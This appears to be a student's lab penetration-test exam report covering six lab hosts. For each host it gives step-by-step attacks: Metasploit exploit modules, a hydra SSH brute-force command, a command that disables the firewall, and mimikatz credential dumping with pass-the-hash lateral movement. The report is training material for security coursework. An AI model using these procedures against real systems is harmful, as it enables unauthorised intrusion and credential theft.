Ape-Testing, LLC

Final Penetration Test

3.12.2018

This Report was Prepared By:

Taco Lemur Security
Alyssa Evans
alyevans@uat.edu
 Table of Contents
Introduction ..................................................................................................................................... 2
Summary of Findings ...................................................................................................................... 2
SPIDER ........................................................................................................................................... 3
FOX................................................................................................................................................. 6
OWL ............................................................................................................................................... 9
MONGOOSE ................................................................................................................................ 12
FROG ............................................................................................................................................ 18
LION ............................................................................................................................................. 22
Feedback ....................................................................................................................................... 30

1|Page
Introduction
Taco Lemur Security Team was tasked with displaying the knowledge and skills necessary to
prove worthy to be contracted as a local company’s Penetration Tester. The layout of the
network was discovered using reconnaissance techniques previously learned using the Kali
Linux system provided.

Summary of Findings
What are the IP addresses of the servers on your network?
192.168.1.90: Spider
192.168.37.10: Lion
192.168.37.20: Fox
192.168.37.30: Owl
192.168.37.50: Mongoose
192.168.37.250: Frog
What information from a compromised hosts might you be able to use to find out if the company
has any other servers?
Knowing that there are more services needed to keep the network afloat and that those
servers have not been discovered yet helps. Using nmap -sn 192.168.1.1/16 will provide a
list of active hosts on the network which can then be cross referenced with what is already
known of the network.
After your penetration test, what are your detailed recommendations to this company regarding
fixing their vulnerabilities?
Upgrade to a well-supported OS such as Windows 7 that is still receiving updates, ensure
that passwords are unrelated to the user, make sure the Firewall is as secure as possible,
closing all unnecessary ports such as port 445, and make sure that all servers being used
are utilizing the most current and updated software when possible unlike Easy FTP Server
and Easy Chat Server.

2|Page
SPIDER
What services are running on server 1?
Apache httpd 2.0.64
Netbios-ssn
Microsoft Windows XP microsoft-ds

What else can you find out about this service? (hint: Google).
Port 445 is used for direct TCP/IP MS Networking access without the need for a NetBIOS
layer.
Provide detailed information on how you compromised this server.
Attempt port 80 by usinga web browser and going to 192.168.1.90 and see what
information can be discovered.

3|Page
No important information related to other ports available and nothing hidden in its source
code. There is a known vulnerability with port 445 however. Open metaslpoit type “use
exploit/windows/smb/ms08_067_netapi” and then hit enter. Type “show options” to verify
parameters that must be set. Set said parameters and then type “exploit”. When successful,
navigate through directory until secret file is shown. Download secret file.

What are the contents of the file located on this server at “C:\” ?

4|Page
5|Page
FOX
What services are running on server 1?
HTTP and HTTPS

What else can you find out about this service? (hint: Google).
Port 80 is the primary port used by the world wide wen system and port 443 is used for
secure web browser communication.
Provide detailed information on how you compromised this server.
Attempt Port 80 to discover running a chat server that has a known vulnerability. Open
metaslpoit type “use exploit/windows/http/easychatserver_username” and then hit enter.
Type “show options” to verify parameters that must be set. Set said parameters and then
type “exploit”. When successful, navigate through directory until secret file is shown.
Download secret file.

6|Page
7|Page
What are the contents of the file located on this server at “C:\” ?

8|Page
OWL
What services are running on server 1?
EasyFTP Server ftpd

What else can you find out about this service? (hint: Google).
Port 21 is a reserved TCP port used by File Transfer Protocol (FTP) to initiate and control
connections to FTP serevers.
Provide detailed information on how you compromised this server.
Attempt Port 8080 to discover web application that requires username and password that
is not known. No important information was hidden in its source code. Attempt to use ftp
as an anonymous user. Cannot access files without logging in and password is unknown.
There is a known vulnerability with port 21 however. Open metaslpoit type “use
exploit/windows/ftp/easyftp_cwd_fixret” and then hit enter. Type “show options” to verify
parameters that must be set. Set said parameters and then type “exploit”. When successful,
navigate through directory until secret file is shown. Download secret file.

9|Page
10 | P a g e
What are the contents of the file located on this server at “C:\” ?

11 | P a g e
MONGOOSE
What services are running on server 1?
Microsoft ESMTP 6.0.2600.2180
Microsoft IIS httpd 5.1
Microsoft SQL Server 2005 9.00.1399; RTM
Microsoft Windows RPC
Microsoft ftpd

What else can you find out about this service? (hint: Google).
Port 1433 is used for Microsoft SQL Server and has known vulnerabilities.
Provide detailed information on how you compromised this server.
Based on the hint and knowing it’s an SQL server, the following was discoeverd when
looking for exploits. Open metaslpoit type “use auxiliary/admin/mssql/mssql_exec” and
then hit enter. Type “show options” to verify parameters that must be set. Set said
parameters and then type “exploit”. Type “use auxiliary/scanner/mssql/mssql_login” and
then hit enter. Type “show options” to verify parameters that must be set. Set said
parameters and then type “exploit”. Type “use auxiliary/admin/mssql/mssql_enum” and
then hit enter. Type “show options” to verify parameters that must be set. Set said
parameters and then type “exploit”. Type “exploit/windows/mssql/mssql_payload” and
then hit enter. Type “show options” to verify parameters that must be set. Set said
parameters and then type “exploit”. When successful, navigate through directory until
secret file is shown. Download secret file.

12 | P a g e
13 | P a g e
14 | P a g e
15 | P a g e
16 | P a g e
What are the contents of the file located on this server at “C:\” ?

17 | P a g e
FROG
What services are running on server 1?
OpenSSH 3.8.1p1 (protocol 2.0)

What else can you find out about this service? (hint: Google).
Port 22 is the Secure Shell Protocol. It most commonly gives command line access as a
secure replacement for Telnet.
Provide detailed information on how you compromised this server.
Based on the hint and knowing that ssh would require a username and password, a series
of password list were used to bruteforce the account including the information from the
first web page discovered. Within the terminal type, “hydra -L /root/Desktop/test.txt -P
/root/Desktop/test.txt -e nsr 192.168.37.250 ssh”. The file “test.txt” is the generated list of
possible passwords and usernames. When successful, ssh into 192.168.37.250 using the
information supplied and navigate through the directory until secret file is shown. Type
“more secretfile4.txt” and then hit enter to view file.

18 | P a g e
19 | P a g e
What are the contents of the file located on this server at “C:\” ?

20 | P a g e
21 | P a g e
LION
What services are running on server 1?
Netbios-ssn
Microsoft Windows XP microsoft-ds

What else can you find out about this service? (hint: Google).
Port 445 is used for direct TCP/IP MS Networking access without the need for a NetBIOS
layer.
Provide detailed information on how you compromised this server.
Based on the hints and advice given from the previous box, within the command window
type “netsh firewall set opmode disable” and hit enter. Open metaslpoit type “use
exploit/windows/smb/ms08_067_netapi” and then hit enter. Type “show options” to verify
parameters that must be set. Set said parameters and then type “exploit”. Type “getuid”
and hit enter to verify that Server username is NT AUTHORITY\SYSTEM. If not, type
“getsystem” and hit enter. Type “load mimikatz” and hit enter, then type “kerberos” and
hit enter. Type “hashdump” and hit enter. Save this for later. Type “background”, hit
enter, type “y”, and then hit enter. Type “use auxiliary/scanner/portscan/tcp” and then hit
enter. Type “show options” to verify parameters that must be set. Set said parameters and
then type “exploit”. When done properly, it will list 192.168.37.10 as having ports 445 and
139 open. Open metaslpoit type “use exploit/windows/smb/ms08_067_netapi” and then hit
enter. Type “show options” to verify parameters that must be set. Set said parameters and
then type “exploit”. Open metaslpoit type “use exploit/windows/smb/pexec” and then hit
enter. Type “show options” to verify parameters that must be set. Set said parameters and
then type “exploit”. Use the hashes from earlier when setting the parameters and the
domain HACKME. When successful, type “sysinfo” to verify you are in the final server dn
then navigate through directory until secret file is shown. Download secret file.

22 | P a g e
23 | P a g e
24 | P a g e
25 | P a g e
26 | P a g e
27 | P a g e
28 | P a g e
What are the contents of the file located on this server at “C:\” ?

29 | P a g e
Feedback
What did you think of the final?
I thought it was the right amount of difficulty. There were times when it was
challenging, but not to the point of impossible to complete.
How much time did you spend on this exam?
8-10 hours
What other feedback do you have? Think of anything that didn’t work as it was supposed to, any
issues that you had, anything you think should change, or positive stuff is cool too.
It was good to put a reminder to restart the box if the services seem down. One of
my boxes kept saying that it had all 1000 ports filtered until I remembered that it
may just needed to restart. I feel a reminder to not overthink things may also be a
good idea in the future. There are a few opportunities where overthinking could
happen, but could be easily avoided by just reminding us that it may be as simple it
seems.

30 | P a g e